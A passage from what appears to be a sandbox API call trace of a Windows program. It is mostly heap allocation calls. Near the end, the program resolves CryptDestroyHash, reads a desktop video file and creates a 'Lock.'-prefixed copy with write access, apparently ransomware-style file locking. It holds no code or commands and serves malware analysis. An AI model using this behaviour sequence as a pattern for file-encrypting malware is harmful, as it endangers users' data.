lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0188.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0188.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0188.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.009] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0188.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0188.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.010] CryptDestroyHash (hHash=0xaa5820) returned 1 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0188.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0188.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0188.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.017] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.018] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.018] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.018] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.019] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/md6gSAuODLhq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\md6gsauodlhq.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a8 [0188.019] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.019] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0188.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0188.019] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.019] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.019] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.020] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.md6gSAuODLhq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.md6gsauodlhq.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0188.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0188.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0188.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.021] SetFilePointerEx (in: hFile=0x2a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0188.021] ReadFile (in: hFile=0x2a8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x7acb, lpOverlapped=0x0) returned 1 [0188.022] ReadFile (in: hFile=0x2a8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0188.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0188.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7acb) returned 